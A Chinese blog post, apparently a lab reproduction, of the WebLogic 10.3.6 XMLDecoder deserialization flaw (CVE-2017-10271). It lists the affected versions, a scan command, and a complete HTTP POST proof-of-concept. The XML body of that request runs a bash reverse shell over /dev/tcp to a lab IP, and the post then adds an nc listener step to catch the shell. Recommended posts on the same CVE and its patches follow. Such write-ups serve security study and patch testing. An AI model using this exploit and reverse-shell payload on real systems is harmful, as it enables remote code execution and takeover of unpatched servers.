weblogic_10.3.6反序列化漏洞复现

最新推荐文章于 2023-09-16 12:30:00 发布
最新推荐文章于 2023-09-16 12:30:00 发布
阅读量771 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/acdcccc/article/details/132701031
版权

weblogic_10.3.6_unserialize _CVE-2017-10271

说明内容
漏洞编号CVE-2017-10271
漏洞名称Weblogic 10.3.6反序列化漏洞
漏洞评级高危
影响范围WebLogic Server 10.3.6.0
WebLogic Server 12.1.3.0
WebLogic Server 12.2.1.3
WebLogic Server 12.2.1.4
WebLogic Server 14.1.1.0
漏洞描述Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
修复方案更新官网补丁

漏洞描述

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

漏洞等级

高危

影响版本

  • Oracle WebLogic Server 10.3.6.0
  • Oracle WebLogic Server 12.1.3.0
  • Oracle WebLogic Server 12.2.1.3
  • Oracle WebLogic Server 12.2.1.4
  • Oracle WebLogic Server 14.1.1.0

漏洞复现

基础环境

组件版本
OSwindows server 2016
Web Serverchrome
weblogic10.3.6.

漏洞扫描

使用nacs工具进行扫描

sudo ./nacs -h 192.168.117.163 -pa 7001

在这里插入图片描述

漏洞验证

  1. 访问到/wls-wsat/CoordinatorPortType页面,进行抓包

    http://192.168.117.163:7001/wls-wsat/CoordinatorPortType

    在这里插入图片描述

  2. 修改为POST请求,修改Content-Type为text/xml,发送POC数据包

    POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: 192.168.117.163:7001

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: zbx_sessionid=49238ed3d29ae14f3a4d158dfa8c26cf; ADMINCONSOLESESSION=0SvVk3LQ3j5nxTC5CnGJnMLGrzhmhLLW2Lnj1SqsWp2fllTs7QMD!890617266

Connection: close

Content-Type: text/xml

Content-Length: 638



<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.4.0" class="java.beans.XMLDecoder">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/192.168.117.163/21 0&gt;&amp;1</string>

</void>

</array>

<void method="start"/></void>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>

  3. dnslog反弹

深度利用

GetShell

  1. 将反弹shell语句加入poc(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误)

    <string>bash -i &gt;&amp; /dev/tcp/192.168.117.163/21 0&gt;&amp;1</string>

  2. kali开启监听,监听21端口

    nc -lnvp 21

  3. 发包,反弹shell

    在这里插入图片描述

漏洞挖掘

网络测绘

weblogic

修复建议

更新官网补丁

weblogic相关漏洞复现
weixin_45605374的博客
06-15 1190
weblogic weblogic中间件是是用来构建网站的必要软件,具有解析、发布网页等功能,它是用纯java开发的 CVE-2017-10271 产生原因 CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 影响版本 10.3.6.0.0,12.1.3.0.
记一次weblogic10.3.6.0漏洞cve-2018-3191补丁升级
老赵的博客
01-13 2490
1、下载补丁包: 因为weblogic10.3.6.0网络安全查出cve-2018-3191漏洞,需要更新补丁,在oracle官网补丁不太好找,记录一下; 首先查看文档 https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW 在文档中选中下图位置: 下一步,登录oracl...
关于weblogic 10.3.6.0漏洞复现(2)
aopingying8163的博客
05-09 194
今天小R又学会了一个工具的使用,而且这个工具很强大很强大。 待会介绍。 一、需要的试验环境: 一台宿主机,虚拟机(kali+window2008或其他版本的windows)1.宿主机需要的工具:BT(burpsuite) 2.虚拟机kali:CobaltStrike 工具(我用的是3.8版本),由于这个工具容易被百度云和谐我就步发百度云链接了。可以找我要:QQ135618755...
关于weblogic 10.3.6.0漏洞复现(1)
aopingying8163的博客
05-08 614
最近小R 搭建了个weblogic, 因为之前在公司找系统漏洞的时候,发现了这个漏洞,所以为了特地专门搭建了个10.3.6.0版本。 漏洞编号: CVE-2017-10271 漏洞的描述:就是weblogic 的WLS组件中存在了CVE-2017-10271远程代码的执行漏洞,可以构造请求运行weblogic中间件的主机来进行攻击。此外,还可以利用此漏洞来进行挖矿。 1. 环境就...
vulhub-Weblogic-10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)
m0_58265086的博客
09-08 140
再把抓到的包,按如下的代码复制,并对反弹sheel的ip更改为kali源码。输入ls -al显示目录下的所有文件夹及文本文档。(这里成功反弹,并获取sheel)然后打开kali,输入代码,这里成功抓到sheel。
Weblogic10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)
EC_Carrot的博客
08-18 416
漏洞简介 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 影响范围 Oracle WebLogic Server 10.3.6.0.0版本,12.1.3.0.0版本,12.2.1.1.0版本,12.2.1.2.0版本。 漏洞复现 发送如下数据包来反弹shell: POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: yo
weblogic10.3.6补丁(java反序列化漏洞更新步骤).docx
09-10
WebLogic 10.3.6 补丁(Java 反序列化漏洞更新步骤) WebLogic 10.3.6 补丁是一种安全补丁,旨在修复 Java 反序列化漏洞,该漏洞可能会导致 WebLogic 服务器遭受远程攻击。下面是 WebLogic 10.3.6 补丁的更新步骤:...
Weblogic10.3.6反序列化漏洞补丁更新
maple_fix的博客
05-17 6435
升级步骤(weblogic版本为10.3.6,补丁包版本为:p27395085_1036_Generic.zip): 1、登录linux的weblogic用户,切换到/app/bea/weblogic/Oracle/Middleware/utils/bsu/目录下。(weblogic安装目录因人而异) 2、查看当前weblogic补丁版本,并确认所有域的进程全部关闭 ps -ef |grep...
Weblogic10.3.6反序列化漏洞补丁(3L3H)升级方案
孑木文学的博客
10-29 3147
针对这几年来WebLogic软件经常报出的java反序列化漏洞问题,因为weblogic底层也使用Apache Commons Collections库,WebLogic 存在Java反序列化漏洞无疑的,在漏洞修复这方面,Oracle可是很不走心,每个季度更新补丁包,还是未修完,本文针对Weblogic反序列化漏洞补丁提供升级方案以及升级过程遇到问题问题过程处理。
WebLogic 10.3.6 反序列化漏洞补丁与升级指南
WebLogic 10.3.6版本中,就存在相关的反序列化漏洞,这对使用该版本的企业和机构构成潜在的威胁。如果不及时修复这些漏洞,可能会被黑客利用进行攻击,导致数据泄露或其他安全事故。 #### 知识点四:补丁包及升级...
weblogic Weblogic WLS组件漏洞处置 补丁10.3.6.0.0升级10.3.6.0.12
01-09
文件中有两个patch需要打,然后有测试工具和补丁教程可以参看
Weblogic10.3.6-2019-4月更新后版本反序列化漏洞补丁.zip
07-29
Weblogic10.3.6-64位-2019年4月更新后版本--linux系统--反序列化漏洞补丁
WebLogic 10.3.6 反序列化漏洞补丁安装指南
网络安全领域,反序列化漏洞是一种常见的攻击手段,攻击者可以通过恶意构造的序列化对象来触发服务器的不安全行为,可能导致远程代码执行、信息泄露等严重后果。WebLogic,作为Oracle公司的一款企业级应用服务器,...
WebLogic 10.3.6.0 升级反序列化漏洞补丁
weixin_34220179的博客
02-08 755
由于最近比特币被炒到近乎不可思议的价格,所以网络上的肉鸡都被黑产们一个个培养成了挖矿鸡。今儿就聊聊如何进行WebLogic10反序列化漏洞的升级方法。 1、修改bsu.sh 把内存调大vi /home/weblogic/bea/utils/bsu/bsu.sh把这段修改成MEM_ARGS="-Xms1G -Xmx2G"2、下载补丁mkdir -p /home/weblogic/bea/u...
weblogic 端口号_漏洞复现:Weblogic < 10.3.6 反序列化漏洞(CVE201710271)
weixin_31955599的博客
01-26 211
文章说明漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习。源码下载连接在文章最后。漏洞说明Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。环境搭建1...
漏洞复现WebLogic Server 远程代码执行漏洞(CVE-2021-2109)
李火火的安全圈
12-22 1240
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。该漏洞WebLogic的远程代码执行漏洞漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。
weblogic __ 10.3.6 __ 反序列化漏洞 _ CVE-2017-10271
最新发布
cgjil的博客
09-16 293
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。2、对wls-wsat的资源访问在防火墙或路由器和交换机上做acl访问控制规则。3、在不影响业务的前提下删除相应war包。1、更新Oracle相应补丁。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值